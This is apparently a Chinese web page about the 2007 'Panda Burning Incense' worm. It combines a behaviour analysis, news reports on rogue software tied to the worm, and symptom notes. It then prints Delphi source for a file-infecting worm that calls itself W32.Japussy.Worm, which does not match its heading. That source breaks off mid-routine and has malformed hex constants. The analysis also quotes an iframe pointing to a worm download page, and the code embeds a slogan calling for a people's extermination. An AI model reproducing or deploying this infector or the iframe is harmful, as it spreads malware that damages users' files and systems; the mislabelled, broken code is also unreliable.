Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
……
(病毒將不感染文件名如下的文件):
setup.exe
NTDETECT.COM

病毒將使用兩類感染方式應(yīng)對(duì)不同后綴的文件名進(jìn)行感染
    1)二進(jìn)制可執(zhí)行文件(后綴名為:EXE,SCR,PIF,COM): 將感染目標(biāo)文件和病毒溶合成一個(gè)文件(被感染文件貼在病毒文件尾部)完成感染.
   
    2)腳本類(后綴名為:htm,html,asp,php,jsp,aspx): 在這些腳本文件尾加上如下鏈接(下邊的頁面存在安全漏洞):
    <iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染時(shí)會(huì)刪除這些磁盤上的后綴名為.GHO

2.★生成autorun.inf
  病毒建立一個(gè)計(jì)時(shí)器以，6秒為周期在磁盤的根目錄下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open關(guān)聯(lián)使病毒在用戶點(diǎn)擊被感染磁盤時(shí)能被自動(dòng)運(yùn)行。

3.★局域網(wǎng)傳播
  病毒生成隨機(jī)個(gè)局域網(wǎng)傳播線程實(shí)現(xiàn)如下的傳播方式：
當(dāng)病毒發(fā)現(xiàn)能成功聯(lián)接攻擊目標(biāo)的139或445端口后，將使用內(nèi)置的一個(gè)用戶列表及密碼字典進(jìn)行聯(lián)接。（猜測(cè)被攻擊端的密碼）當(dāng)成功的聯(lián)接上以后將自己復(fù)制過去并利用計(jì)劃任務(wù)啟動(dòng)激活病毒。
修改操作系統(tǒng)的啟動(dòng)關(guān)聯(lián)
下載文件啟動(dòng)  
與殺毒軟件對(duì)抗
   
【一些報(bào)道和評(píng)論】


“‘流氓軟件’和病毒之間的界限已變得越來越模糊。為了達(dá)到更好的傳播效果，并減少成本，不少中小廠商直接使用病毒進(jìn)行‘流氓推廣’。”昨日，反病毒專家直指流氓軟件是這次“熊貓燒香”幕后黑手。

據(jù)江民公司反病毒工程師稱，已經(jīng)發(fā)現(xiàn)了近期瘋狂肆虐的“熊貓燒香”幕后勢(shì)力的痕跡，“熊貓燒香”病毒被懷疑是由“超級(jí)巡警”軟件的提供方在幕后推動(dòng)，網(wǎng)上已經(jīng)發(fā)現(xiàn)了產(chǎn)銷一條龍盜竊銷售網(wǎng)游設(shè)備的產(chǎn)業(yè)鏈。

而從瑞星截獲的“熊貓燒香(Worm.Nimaya)”樣本進(jìn)行分析，也有不少變種運(yùn)行后會(huì)去從網(wǎng)上下載盜取“江湖”、“大話西游”、“魔獸”等網(wǎng)絡(luò)游戲賬號(hào)的木馬。用戶的計(jì)算機(jī)一旦被感染這些木馬，游戲的賬號(hào)、裝備等就會(huì)被黑客竊取。黑客通過在網(wǎng)上倒賣網(wǎng)游賬號(hào)、裝備等獲利。

流氓軟件分化：部分“洗白” 部分病毒化。全民范圍內(nèi)的討伐使流氓軟件開始出現(xiàn)“分化”。

北京瑞星股份有限公司反病毒工程師史瑀向《每日經(jīng)濟(jì)新聞》表示，迫于技術(shù)和輿論的壓力，制作流氓軟件的廠商開始兩極分化。一些大牌互聯(lián)網(wǎng)廠商逐漸“洗白”，將軟件的“流氓”程度降低，還有一些廠商干脆放棄推廣“流氓軟件”。然而，仍有大量的中小廠商是通過“流氓軟件”起家的，通過“流氓軟件”進(jìn)行廣告推廣已經(jīng)成為其公司主要甚至是唯一的收入來源。2006年下半年開始，一些廠商為了生存，不惜鋌而走險(xiǎn)，使用更加卑劣的手段進(jìn)行流氓推廣，并且采用更加惡毒的技術(shù)公然向反病毒軟件、反流氓軟件工具挑戰(zhàn)。

據(jù)瑞星公司客戶服務(wù)中心的統(tǒng)計(jì)數(shù)據(jù)表明，從2006年6月開始，用戶計(jì)算機(jī)由于流氓軟件問題導(dǎo)致崩潰的求助數(shù)量已經(jīng)超過了病毒。

據(jù)專家介紹，這一時(shí)期的“流氓軟件”有兩大特點(diǎn)：一是編寫病毒化。不少“流氓軟件”為了防止被殺毒軟件或流氓軟件卸載工具發(fā)現(xiàn)，采用了病毒常用的 Rootkit技術(shù)進(jìn)行自我保護(hù)。Rootkit可以對(duì)自身及指定的文件進(jìn)行隱藏或鎖定，防止被發(fā)現(xiàn)和刪除。帶有Rootkit的“流氓軟件”就像練就了 “金鐘罩”、“鐵布杉”，不除去這層保護(hù)根本難傷其毫發(fā)。更有一些流氓軟件，采用“自殺式”技術(shù)攻擊殺毒軟件。一旦發(fā)現(xiàn)用戶安裝或運(yùn)行殺毒軟件，便運(yùn)行惡意代碼，直接造成計(jì)算機(jī)死機(jī)、藍(lán)屏，讓用戶誤以為是殺毒軟件存在問題。

二是傳播病毒化。為了達(dá)到更好的傳播效果，并減小成本，不少中小廠商直接使用病毒進(jìn)行“流氓推廣”。用戶的計(jì)算機(jī)感染病毒后，病毒會(huì)自動(dòng)在后臺(tái)運(yùn)行，下載并安裝“流氓軟件”。同時(shí)，“流氓軟件”安裝后也會(huì)去從互聯(lián)網(wǎng)自動(dòng)下載運(yùn)行病毒。大量的“流氓軟件”開始使用電腦病毒來隱藏自身、進(jìn)行快速傳播、并對(duì)抗用戶的清除等，這些行為嚴(yán)重危害到用戶的信息安全和利益。“流氓軟件”和病毒之間的界限已變得越來越模糊。隨著“流氓軟件”不斷朝著病毒的方向發(fā)展，要想徹底殺滅“流氓軟件”就必須采用反病毒技術(shù)。

利益驅(qū)使 流氓軟件制造“熊貓燒香”？

史瑀表示，2006年11月14日，瑞星發(fā)布流氓軟件專用清除工具———卡卡上網(wǎng)安全助手3.0，首次將反病毒技術(shù)應(yīng)用于反流氓軟件當(dāng)中。就在卡卡剛剛發(fā)布24小時(shí)，就有一個(gè)名為“my123”的惡意程序頂風(fēng)作案，瘋狂采用病毒化的編寫技術(shù)來逃避卡卡的追殺，隨后又出現(xiàn)了名為“3448.com”和 “7939.com”兩個(gè)流氓軟件，它們鎖定用戶瀏覽器的首頁以提高其網(wǎng)站訪問量。

此后，部分流氓軟件開始和病毒合作。早先一個(gè)傳播較廣的蠕蟲病毒“威金蠕蟲(Worm.Viking)”，就會(huì)從病毒作者指定的網(wǎng)站去下載流氓軟件、盜號(hào)木馬等，并種植在用戶的計(jì)算機(jī)上。

“大量‘流氓軟件’開始使用電腦病毒來隱藏自身、進(jìn)行快速傳播、并對(duì)抗用戶的清除等，這些行為嚴(yán)重危害到用戶的信息安全和利益。”史瑀稱，“‘熊貓燒香’病毒成為一個(gè)‘教科書’式的病毒，勢(shì)必有大量的病毒會(huì)模仿它的特征進(jìn)行編寫。”

1月29日，金山毒霸反病毒中心最新消息：“熊貓燒香”化身“金豬”，危害指數(shù)再度升級(jí)，按照目前“熊貓燒香”破壞程度，威脅將延伸至春節(jié)。而在瑞星全球反病毒監(jiān)測(cè)網(wǎng)27日監(jiān)測(cè)結(jié)果顯示，27日一個(gè)“電眼間諜變種BSF(Trojan.Spy.Delf.bsf)”病毒又出現(xiàn)，該病毒與“熊貓燒香”病毒類似。

而業(yè)內(nèi)人士稱，近日由于地震引起海底光纜中斷，造成數(shù)百萬使用國(guó)外殺毒軟件的個(gè)人用戶、數(shù)十萬企業(yè)和政府局域網(wǎng)用戶無法升級(jí)。這又意味著這些用戶的電腦完全向病毒和黑客敞開了大門。

“在沒有法律法規(guī)出臺(tái)前，流氓軟件是不會(huì)縮手的，不排除‘熊貓燒香’是流氓軟件所為。”昨日，中國(guó)反流氓軟件聯(lián)盟李佳衡表示：“只要有利益驅(qū)使，流氓軟件就會(huì)變化形式，以更不容易察覺的病毒方式毫無忌憚地牟取利益。”

熊貓燒香”化身“金豬”，春節(jié)大爆發(fā)。

“長(zhǎng)假是病毒的高發(fā)期，特別是長(zhǎng)假之后，病毒綜合癥接踵而來。”金山毒霸反病毒專家戴光劍說，“目前我們已經(jīng)截獲‘金豬’的變種。被感染的電腦中不但‘熊貓’成群，而且‘金豬’能使系統(tǒng)被破壞，大量軟件無法應(yīng)用。”這一觀點(diǎn)得到了上海市計(jì)算機(jī)病毒防范服務(wù)中心的認(rèn)同。

一旦中毒，用戶也不用慌張，用戶可撥打上海市信息化服務(wù)熱線電話9682000尋求幫助。張丹

“熊貓燒香”病毒攻略：防御和解除方法

　　計(jì)世網(wǎng)消息在2007年新年出現(xiàn)的“PE_FUJACKS”就是最近讓廣大互聯(lián)網(wǎng)用戶聞之色變的“熊貓燒香”。該病毒的作者為“武漢男生”(文件末簽名” WhBoy”)，這個(gè)版本的病毒已經(jīng)集成了PE_FUJA CK和QQ大盜的代碼，通過網(wǎng)絡(luò)共享,文件感染和移動(dòng)存儲(chǔ)設(shè)備傳播，尤其是感染網(wǎng)頁文件，并在網(wǎng)頁文件寫入自動(dòng)更新的代碼，一旦瀏覽該網(wǎng)頁，就會(huì)感染更新后的變種。

　　不幸中招的用戶都知道，“熊貓燒香”會(huì)占用局域網(wǎng)帶寬，使得電腦變得緩慢，計(jì)算機(jī)會(huì)出現(xiàn)以下癥狀：熊貓燒香病毒會(huì)在網(wǎng)絡(luò)共享文件夾中生成一個(gè)名為 GameSetup.exe的病毒文件；結(jié)束某些應(yīng)用程序以及防毒軟件的進(jìn)程，導(dǎo)致應(yīng)用程序異常，或不能正常執(zhí)行，或速度變慢；硬盤分區(qū)或者U盤不能訪問使用；exe程序無法使用程序圖標(biāo)變成熊貓燒香圖標(biāo)；硬盤的根目錄出現(xiàn)setup.exe auturun.INF文件；同時(shí)瀏覽器會(huì)莫名其妙地開啟或關(guān)閉。

　　該病毒主要通過瀏覽惡意網(wǎng)站、網(wǎng)絡(luò)共享、文件感染和移動(dòng)存儲(chǔ)設(shè)備(如U盤)等途徑感染，其中網(wǎng)絡(luò)共享和文件感染的風(fēng)險(xiǎn)系數(shù)較高，而通過Web和移動(dòng)存儲(chǔ)感染的風(fēng)險(xiǎn)相對(duì)較低。該病毒會(huì)自行啟動(dòng)安裝，生成注冊(cè)列表和病毒文件%System%\drivers\spoclsv.exe ，并在所有磁盤跟目錄下生成病毒文件setup.exe,autorun.inf 。


【熊貓燒香的病毒源碼】

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432;             //病毒體的大小
IconOffset = EB8;           //PE文件主圖標(biāo)的偏移量

//在我的Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量
  
{
HeaderSize = 38912;             //Upx壓縮過病毒體的大小
IconOffset = BC;             //Upx壓縮過PE文件主圖標(biāo)的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize   = E8;             //PE文件主圖標(biāo)的大小--744字節(jié)
IconTail   = IconOffset + IconSize; //PE文件主圖標(biāo)的尾部
ID       = 444444;         //感染標(biāo)記

//垃圾碼，以備寫入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
        'If a country need to be destroyed, it must be Japan! ' +
        '*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stDCall; external 'Kernel32.dll'; //函數(shù)聲明
var
TmpFile: string;
Si:     STARTUPINFO;
Pi:     PROCESS_INFORMATION;
IsJap:   Boolean = False; //日文操作系統(tǒng)標(biāo)記
{ 判斷是否為Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
  Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  Result := True;
end;
{ 在流之間復(fù)制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 將宿主文件從已感染的PE文件中分離出來，以備使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
  sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
    dStream := TFileStream.Create(FileName, fmCreate);
    try
    sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分
    dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
    finally
    dStream.Free;
    end;
  finally
    sStream.Free;
  end;
except
end;
end;
{ 填充STARTUPINFO結(jié)構(gòu) }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 發(fā)帶毒郵件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出錯(cuò)則文件正在被使用，退出
  if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己則不感染
    Exit;
  Infected := False;
  IsPE   := False;
  SrcStream := TFileStream.Create(FileName, fmOpenRead);
  try
    for i := 0 to 8 do //檢查PE文件頭
    begin
    SrcStream.Seek(i, soFromBeginning);
    SrcStream.Read(Buf, 2);
    if (Buf[0] = #80) and (Buf[1] = #69) then //PE標(biāo)記
    begin
      IsPE := True; //是PE文件
      Break;
    end;
    end;
    SrcStream.Seek(-4, soFromEnd); //檢查感染標(biāo)記
    SrcStream.Read(iID, 4);
    if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
    Infected := True;
  finally
    SrcStream.Free;
  end;
  if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
    Exit;
  IcoStream := TMemoryStream.Create;
  DstStream := TMemoryStream.Create;
  try
    aIcon := TIcon.Create;
    try
    //得到被感染文件的主圖標(biāo)(744字節(jié))，存入流
    aIcon.ReleaseHandle;
    aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
    aIcon.SaveToStream(IcoStream);
    finally
    aIcon.Free;
    end;
    SrcStream := TFileStream.Create(FileName, fmOpenRead);
    //頭文件
    HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
    try
    //寫入病毒體主圖標(biāo)之前的數(shù)據(jù)
    CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
    //寫入目前程序的主圖標(biāo)
    CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
    //寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù)
    CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
    //寫入宿主程序
    CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
    //寫入已感染的標(biāo)記
    DstStream.Seek(0, 2);
    iID := 444444;